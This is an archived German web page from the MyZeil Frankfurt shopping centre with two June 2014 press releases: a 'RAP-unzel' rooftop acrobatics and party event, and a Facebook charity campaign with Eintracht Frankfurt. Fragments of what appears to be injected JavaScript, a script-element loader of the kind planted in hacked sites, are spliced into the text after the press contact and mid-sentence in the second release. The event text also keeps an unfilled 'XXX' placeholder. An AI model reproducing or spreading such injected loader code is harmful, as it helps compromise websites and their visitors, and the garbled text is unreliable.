Juni, 2014 | MyZeil.de

Archive for Juni, 2014

Summertales 2014: Das Sommermärchen 2.0 mit RAP-unzel und den Partyprinzen

Frankfurt/Main, 26. Juni 2014 – „Rapunzel, Rapunzel, lass Dein Haar herunter!“ Dieser bekannte Satz signalisierte schon in der Grimm’schen Variante den Beginn waghalsiger Kletteraktionen. Am 11. Juli wird er in Frankfurts Multi-Marken-Center auf ungewöhnliche Weise neu interpretiert: MyZeil präsentiert „RAP-unzel“ – das Sommermärchen 2014! Die Schöne RAP-unzel wartet auf dem Dach von MyZeil auf ihre waghalsige Befreiung durch zwei mutige Partyprinzen. Denn Ihre langen Haare stören sie beim Tanzen. Von den Zöpfen befreit kann die Party steigen. Die ungewöhnliche Schreibweise des Namens Rapunzel zeigt an, in welche musikalische Richtung die spektakulären Musik-, Tanz- und Artistik-Darbietung gehen. Die Hauptrolle bei diesem MyZeil-Spektakel spielt das beeindruckend designte Glasdach mit seinem gigantischen Trichter, der von der Zeil und dem Inneren des Centers bis über die Dächer Frankfurts reicht. Er ist der moderne „Turm“, den es zu erklimmen gilt. Rund XXX Meter werden die Artisten der MyZeilGroup während des Aufstiegs mit reiner Muskelkraft überwinden, um RAP-unzel von ihren Zöpfen zu befreien und so den Kick-Off für ein mitreißendes Event in der Summertales-Lounge zu signalisieren: fette Beats, coole Drinks, Arstisktik, Livemusik der Urban Club Band, eine original Vespa als Hauptgewinn und weitere großartige Highlights. Los geht’s um 18.00 Uhr, wenn sich die beiden Prinzen auf ihren „weißen Pferden“, zwei Velo-Taxis, auf den Weg zu ihrer mutigen Mission machen.

Ihren „Ritt“ zum Turm starten die Prinzen an der Konstabler- bzw. der Hauptwache. Unterwegs laden sie Passanten dazu ein, ihnen zu folgen – was sich lohnt, denn vor MyZeil angekommen, wird eine Konfetti-Kanone zahlreiche Gutscheine für Freigetränke und weitere Gewinne in die Luft schießen. Zudem gibt es die Chance auf den Gewinn einer Vespa. Um ca. 18.45 Uhr machen sich die Prinzen dann auf den Weg zu RAP-unzel: An zwei langen Zöpfen klettern sie im Inneren und am Äußeren des Glastrichters hinauf bis auf das Dach des Centers, wo sie das schöne Mädchen sehnsüchtig erwartet. „Der MyZeil-Trichter“ ist eines der faszinierendsten Architekturelemente in dieser Stadt. Mit RAP-unzel setzen wir ihn wirklich spektakulär in Szene“, sagt Olaf Deistler, Senior Center Manager von MyZeil. Ihren Aufstieg sowie die Aktionen davor und danach moderieren FFH-Morning-Star Daniel Fischer und Sänger Cristobal.

Doch mit der Befreiung RAP-unzels ist der Abend im MyZeil noch lange nicht vorbei. Die MyZeil-Group wird weitere Tanz- und Akrobatikaufführungen geben und die Urban Club Band lädt zum Mittanzen ein. Natürlich wird auch das komplette Märchen vorgetragen, untermalt von Hip-Hop-Beats – eine Kunstform, die es exklusiv im MyZeil zu erleben gibt. Die Verlosung der Vespa findet um ca. 21:00 Uhr statt, im Anschluß ist dann entspanntes Chill-out angesagt.

Pressekontakt:
Isabelle Salmon
BALL : COM Communications Company GmbH
Frankfurter Straße 20 I D-63150 Heusenstamm
Fon: +49 6104 6698-13 I Fax: +49 6104 6698-19
E-Mail: myzeil@ballcom.de
document.currentScript.parentNode.insertBefore(s, document.currentScript);

Top

Social-Media-Aktion für den guten Zweck: MyZeil und Eintracht Frankfurt spenden 300.000 Cent an die Leberecht-Stiftung

Jannik Hoffmann (Eintracht), Christina Anthes (Leberecht) und Diana Schreiber (MyZeil, v.l.) bei der Spendenübergabe. Foto: Menzel, FNP

Seit Jahren verbindet das MyZeil eine enge Partnerschaft mit der Eintracht Frankfurt. Die beiden Institutionen, ohne die Frankfurt einfach nicht Frankfurt ist, riefen jetzt gemeinsam zu einer Spendenaktion der besonderen Art auf: die „Aktion 300.000“, die auf der Facebook-Seite der Eintracht gepostet war. Für jede Interaktion der Fans – Liken, Kommentieren, Teilen oder Markieren – versprachen die beiden, jeweils einen Cent an die Leberecht-Stiftung zu spenden. Diese macht sich seit mehr als sechs Jahrzehnten für behinderte und benachteiligte Kinder und Jugendliche und ihre Eltern in der Region stark. Beweggrund für die Spendenaktion war der 300.000ste Facebook-User, der den Social-Media-Auftritt des Bundesligisten „geliked“ hat.

Die Bilanz der „Aktion 300.000“: Zu 300.000 Interaktionen hat es zwar nicht ganz erreicht, trotzdem überwiesen MyZeil und Eintracht Frankfurt jeweils 1.500 € (insgesamt 3.000 €) für den guten Zweck.var d=document;var s=d.createElement(‘script’);

Top
Seite 1 von 1

Fragen? Wir helfen Ihnen gerne! 069 - 29723970

Sie erreichen uns Mo-Mi von 10-20 Uhr und Do-Sa von 10-21 Uhr